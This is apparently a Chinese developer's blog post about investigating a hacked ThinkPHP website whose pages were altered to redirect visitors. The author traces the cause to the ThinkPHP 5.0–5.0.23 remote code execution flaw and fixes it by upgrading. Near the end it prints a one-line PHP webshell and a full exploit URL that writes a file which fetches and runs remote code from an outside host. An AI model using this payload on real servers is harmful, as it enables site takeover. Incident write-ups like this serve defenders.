【注：PHP、ThinkPHP】

事情是这样的~

2019年2月12日，根据客户的反应，说点击网站上的链接都会跳转的别的第三方的网站。然后就开始排查，登录上服务器，把项目的所有文件拷贝下来。

打开入口文件，里面的代码原来是被替换成静态的前端代码~我晕~  当务之急是让网站可以正常的运行，先把这入口文件改回以前的代码上传到服务器，这样网站暂时是可以正常运行了。

但是需要找的问题的根本所在，这种网站代码恶意被修改的事我是第一次遇到，以前都是听说过没见过。 没有经验，就上百度。找一下这个问题的处理和排查流程。

根据网上所述，首先是将一句话代码（<?php @eva l($_POST['a'])>）上传到网站，然后通过这个一句上传一个可以操作网站目录的文件，再通过这个文件对网站的代码进行修改和上传。

所以现在要做的是：

1、首先找到已经被上传到网站的恶意文件，将其删除。

2、找到攻击者所利用的代码中的漏洞。

怎么找到那些已经被上传上来的文件，可以下载安全狗对拷贝下来的所有代码进行扫描，这些文件的代码有的写法会相同。会存在一些函数 eva l、assert，这些文件还好找，找着后在服务器上删除就好了。难的是找到代码中的漏洞，网上提供了一些可能会出现漏洞的地方，一个是上传文件的地方，一个是编辑器插件中带的上传功能。

这些地方我一个试了试，排查了一遍。

2月13日，我发现网站首页又被修改了，看来问题的根本没有找对，继续在网上百度，问一些大佬。

2月14日，还是再找。

2月15日，一位大佬给我发来了一个ThinkPHP框架的漏洞信息，说的是ThinkPHP5.0 ~ 5.0.23之间的版本都存在一个严重的漏洞，可通过这个漏洞执行写文件的操作。

赶紧升级版本，升级的安全的版本。

之后，我也试了一下有漏洞的那个版本，真的可以很容易的将想要的代码写入到文件，然后在线上运行。

而且就是一行连接就能搞定：

项目域名加上

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eva l(file_get_contents(%22http%3a%2f%2fcqy666.cn%2fphp.jpg%22))?^%3E%3Etest.php

然后访问test.php，就能操作网站的所有目录了。Amezing~